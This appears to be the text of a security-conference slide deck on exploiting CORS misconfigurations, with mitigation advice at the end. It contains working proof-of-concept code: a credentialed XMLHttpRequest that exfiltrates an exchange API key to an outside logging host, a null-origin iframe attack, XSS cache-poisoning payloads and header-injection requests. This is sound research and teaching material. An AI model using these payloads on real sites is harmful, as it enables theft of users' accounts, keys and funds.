EXPLOITING

 CORS  
MISCONFIGURATIONS
For  Bitcoins  and  Bounties

James  Kettle
 A  MORAL  STORY

• WeBuy0day
– Internal  team  of  security  experts  
– Users  are  all  security  experts
– Easily  fenced  intellectual  property
– Trivial  CSRF

2009  – CSRF
2016  – CORS
 OVERVIEW

• Fundamentals  &  Limitations

• Consequences
– Exploits  with  credentials
– Exploitation  without  credentials

• Mitigations

• Q&A
 CORE  CONCEPT

Origin: https://mail.google.com

https://mail.google.com Same  Origin  Policy https://dropbox.com

Access-Control-Allow-Origin: https://mail.google.com
Access-Control-Allow-Credentials: true
 ORIGIN  LISTS

Spec:
"Access-­‐Control-­‐Allow-­‐Origin"  ": "  origin-­‐list-­‐or-­‐null

Reality:

“In  practice  the  origin-­‐list-­‐or-­‐null   production  is  more  

constrained.  Rather  than  allowing  a  space-­‐separated  
list  of  origins,  it  is  either  a  single  origin  or  the  string  
"null".”  -­‐ https://www.w3.org/TR/cors/
 WILDCARDS

* is  the  only  wildcard  origin

– https://*.example.com is  not  valid
“The  string  "*"  cannot  be  used  for  a  resource  that  supports  
credentials.”  -­‐ https://www.w3.org/TR/cors/

developers.mozilla.org:
 SOLUTION

• Dynamic  generation
–More  likely  to  be  vulnerable  L
–Less  likely  to  be  discovered*  L

• Bespoke,  security-­‐critical  functionality  

parsing  user-­‐supplied  URLs
–What  could  possibly  go  wrong?
 EXPLOITATION  
WITH  CREDENTIALS

Access-­‐Control-­‐Allow-­‐Credentials:  true
 ORIGIN  REFLECTION

Simple  Origin  Reflection

GET /api/requestApiKey HTTP/1.1
Host: btc-exchange.com
Origin: http://labs-albinowax
Cookie: sessionid=validSessionId

HTTP/1.1 200 OK
Access-Control-Allow-Origin: http://labs-albinowax
Access-Control-Allow-Credentials: true

{"id":"zv691C...
 ORIGIN  REFLECTION

var req = new XMLHttpRequest();

req.onload = reqListener;
req.open('get','https://btc-exchange.com/api/requestApiKey',true);
req.withCredentials = true;
req.send();

function reqListener() {
location='//skeletonscribe.net/log?key='+this.responseText;
}

Use  API  key  to:

Disable  notifications
Enable  2FA
Transfer  BTC  to  your  account
Place  trades
www.btc-­‐bank.ru
 STARTSWITH

GET /api HTTP/1.1

Host: btc.net
Origin: https://btc.net
ACAO: https://btc.net

Origin: https://evil.net
< no CORS headers >

Origin: https://btc.net.evil.net
ACAO: https://btc.net.evil.net
 ENDSWITH

GET /zz/api HTTP/1.1

Host: advisor.com
Origin: https://notadvisor.com

HTTP/1.1 200 OK
Content-Security-Policy: frame-ancestors…
Strict-Transport-Security: max-age=3150000
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block;
ACAO: https://notadvisor.com
ACAC: true
 null  origin

origin-­‐list-­‐or-­‐null
What  is  null?
An  origin  Google  trusts
GET /reader?url=zxcvbn.pdf
Host: docs.google.com
Origin: null

HTTP/1.1 200 OK
ACAO: null
ACAC: true
 null  origin

An  origin  a  bitcoin  wallet  trusts!

GET /wallet
Host: btc-wallet.net
Origin: null

HTTP/1.1 200 OK
ACAO: null
ACAC: true

Found  a  bunch  more  using  Rapid7’s  sonar.http

 null  origin

Who  has  the  null  origin?

<iframe sandbox='allow-scripts allow-forms'
src='
data:text/html, <!DOCTYPE html>
<script>
var req = new XMLHttpRequest();
</script>
'></iframe>
Impact:
– Google  user  account  detail  theft
– Encrypted  wallet  theft
 null  origin

origin-­‐list-­‐or-­‐null
What  is  null?
*,  but  less  obvious
*,  but  more  dangerous
 exHTTPS

Client Attacker Internet

https://google.com/finance

sensitive  share  info

http://cnn.com

307 -> http://evil.google.com

Time

http://evil.google.com
GET /finance HTTP/1.1
CORS  payload Host: google.com
https://google.com/finance Origin: http://evil.google.com

sensitive  share  info HTTP/1.1 200 OK

ACAO: http://evil.google.com
ACAC: true
 SUBDOMAINS

*.yoursite.com is  not  trustworthy

– XSS
– Intentional  XSS  (see:  Bugzilla)
– Subdomain  hijacking
– ISP  content  injection  (HTTP  only)
 EXPLOITATION  
WITHOUT  CREDENTIALS

Access-­‐Control-­‐Allow-­‐Credentials:  false
 TUNNELING

https://attacker.net
INTERNET

LAN

even  though  Jetbrains doesn’t  have  a  bug  bounty  program

Jetbrains quite  generously  awarded  a  bounty  of  $50,000
http://blog.saynotolinux.com/blog/2016/08/15/jetbrains-­‐ide-­‐remote-­‐code-­‐execution-­‐and-­‐local-­‐file-­‐disclosure-­‐vulnerability-­‐analysis/
 CACHE  POISONING

• Vary: Origin
“I  must  say,  it  doesn't  make  me  very  confident  that  soon  
more  sites  will  be  supporting  CORS  if  not  even  the  W3C  
manages   to  configure   its  server  right”  -­‐ Reto Gmür

• What  if  I  don’t?

– Mostly  just  breaks  stuff
– Sometimes  it’s  more  interesting…

https://lists.w3.org/Archives/Public/public-­‐webappsec/2016Jun/0057.html
 CACHE  POISONING:  
CLIENT-­‐SIDE

Make  'unexploitable'  XSS  workable

GET /login HTTP/1.1 HTTP/1.1 200 OK
Host: example.com Access-Control-Allow-Origin: *
Origin: https://evil.com Access-Control-Allow-Headers: X-User
X-User: <svg/onload=alert(1)> Content-Type: text/html

Invalid user: <svg/onload=alert(1)>

var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','http://example.com/login',true);
req.setRequestHeader('X-User', '<svg/onload=alert(1)>');
req.send();
function reqListener() {
location='http://example.com/login';
}
 CACHE  POISONING:  
SERVER-­‐SIDE

Escalate  no-­‐credentials  CORS  access  to  stored  XSS

GET / HTTP/1.1
Origin: z[0d]Content-Type: text/html; charset=UTF-7

Internet  Explorer  Vision™:

HTTP/1.1 200 OK
Access-Control-Allow-Origin: z
Content-Type: text/html; charset=UTF-7

*works  in  Edge  too!

 HTTP  HEADER  INJECTION

GET /?lc=en%0dACAO: null%0dACAC: true

Origin: null

Internet   Explorer   Vision™:

HTTP/1.1 200 OK
Set-Cookie: locale=en
ACAO: null
ACAC: true
 MITIGATIONS  
&  LESSONS  LEARNED

Access-­‐Control-­‐Allow-­‐Nothing
 PENTESTER  LESSONS

Seek  out  APIs

DETECT Try  example.net,  null,  anything  else  

Use  a  request  rewrite  rule

Does  it  only  validate  the  start/end?

MAP Does  it  restrict  the  protocol?
Does  it  require  a  valid  domain?
Are  credentials  supported?

Are  there  potential  exploit  chains?

EXPLOIT Is  Vary:  Origin  specified?
Is  cache  poisoning  practical?
 SPEC  LESSONS

• Wildcard+credentials exception
J Saved  developers.mozilla.org

• Lack  of  partial  wildcards

L Hurts  subdomain  trust

• Suggestions
– Allow  partial   wildcards
– Apply  wildcard  exception  to  'null'
 BROWSER  LESSONS

• Multiple  origins
– J Prevents  trusted  origin  injection:
Origin: https://evil.com safe.example.com
– L Forces  dynamic  generation

• Suggestions:
– Allow  multiple  origins
– Block  reverse  mixed  content
 DEVELOPER  LESSONS

• Don’t  go  dynamic

• Validate  with  caution
– Is  a  valid  domain  name
– Ends  with  your  .yourdomain.tld
– Starts  with  https://
• Specify  Vary:  Origin
• Don't  trust  null!  
 FURTHER  READING

Slides:
https://portswigger.net/knowledgebase/papers/Ex
ploitingCORSMisconfigurations.pdf

Writeup:
http://blog.portswigger.net/2016/10/exploiting-­‐
cors-­‐misconfigurations-­‐for.html

• "Misconfigured  CORS  and  why  web  application  security  

is  not  getting  easier."  – today,  1415
 TAKE-­‐AWAYS

• CORS  misconfigurations  are

–Often  critical
–Sometimes  subtle
–Out  there  if  you  look  for  them

@albinowax
[email protected]